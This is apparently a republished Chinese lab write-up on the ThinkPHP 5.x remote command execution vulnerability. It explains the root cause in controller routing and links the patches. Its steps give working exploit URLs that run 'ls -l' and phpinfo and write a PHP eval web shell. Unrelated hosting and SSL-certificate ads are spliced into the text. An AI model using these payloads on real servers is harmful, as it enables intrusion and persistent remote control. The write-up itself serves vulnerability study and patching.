0x00復(fù)現(xiàn)環(huán)境

ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 遠(yuǎn)程命令執(zhí)行漏洞利用（GetShell）

岑溪ssl適用于網(wǎng)站、小程序/APP、API接口等需要進(jìn)行數(shù)據(jù)傳輸應(yīng)用場(chǎng)景，ssl證書(shū)未來(lái)市場(chǎng)廣闊！成為創(chuàng)新互聯(lián)公司的ssl證書(shū)銷售渠道，可以享受市場(chǎng)價(jià)格4-6折優(yōu)惠！如果有意向歡迎電話聯(lián)系或者加微信：18982081108（備注：SSL證書(shū)合作）期待與您的合作！

0x01步驟

1. 點(diǎn)擊start to hack 進(jìn)入環(huán)境頁(yè)面 run the project 然后訪問(wèn)給出的target address
   執(zhí)行系統(tǒng)命令顯示目錄下文件
   http://aaa.vsplate.me:52763/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l
   

2. 執(zhí)行phpinfo
   http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

3. 寫(xiě)shell

   http://aaa.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php
   想你所想，發(fā)揮創(chuàng)意

0x02漏洞原理分析

關(guān)鍵代碼

在修復(fù)之前程序未對(duì)控制器進(jìn)行過(guò)濾，導(dǎo)致攻 擊 者可以通過(guò)引入 \ 符號(hào)來(lái)調(diào)用任意類方法。

$this -> app -> controller 方法來(lái)實(shí)例化控制器，然后調(diào)用實(shí)例中的方法。
follow the controller method：thinkphp/library/think/App.php

通過(guò)parseModuleAndClass方法解析出$module和$class，實(shí)例化$class。

thinkphp / library / think /App.php

當(dāng)$name以反斜線\開(kāi)始時(shí)直接將其作為類名。
利用命名空間的特點(diǎn)，如果可以控制此處的$name（即路由中的controller部分），那么就可以實(shí)例化任何一個(gè)類。

thinkphp/library/think/route/Rule.php
往回看路由解析的代碼，其中route/dispatch/Url.php:: parseUrl方法調(diào)用了route/Rule.php:: parseUrlPath來(lái)解析pathinfo中的路由信息

route/dispatch/Url.php

route/Rule.php

使用/對(duì)$url進(jìn)行分割，未進(jìn)行任何過(guò)濾。

路由url從Request::path()中獲取

其中，我們來(lái)看一下pathinfo函數(shù)

由于var_pathinfo的默認(rèn)配置為s，我們可利用$_GET['s']來(lái)傳遞路由信息，也可利用pathinfo來(lái)傳遞
但測(cè)試時(shí)windows環(huán)境下會(huì)將$_SERVER['pathinfo']中的\替換為/。結(jié)合前面分析可得初步利用代碼如下：
index.php?s=index/\namespace\class/method
這將會(huì)實(shí)例化\namespace\class類并執(zhí)行method方法

0x03 漏洞PoC

使用的是pocsuite框架

0x04 漏洞修復(fù)

Thinkphp v5.0.x補(bǔ)丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

Thinkphp v5.1.x補(bǔ)丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

0x05 漏洞利用（目前出現(xiàn)的***手段）

威脅預(yù)警 | ThinkPHP v5新漏洞***案例首曝光

0x06 reference

http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23%E5%8F%8Av5.1.31%E4%BB%A5%E4%B8%8B%E7%89%88%E6%9C%AC)_%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%EF%BC%88getshell%EF%BC%89/

【2019-1-24更新】發(fā)現(xiàn)大佬們的動(dòng)態(tài)調(diào)試 下一個(gè)復(fù)現(xiàn)可以試一試

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)scvps.cn，海內(nèi)外云服務(wù)器15元起步，三天無(wú)理由+7*72小時(shí)售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性價(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專為企業(yè)上云打造定制，能夠滿足用戶豐富、多元化的應(yīng)用場(chǎng)景需求。

本文標(biāo)題：【漏洞復(fù)現(xiàn)】ThinkPHP55.x遠(yuǎn)程命令執(zhí)行(getshell)-創(chuàng)新互聯(lián)
URL地址：http://weahome.cn/article/dopcdj.html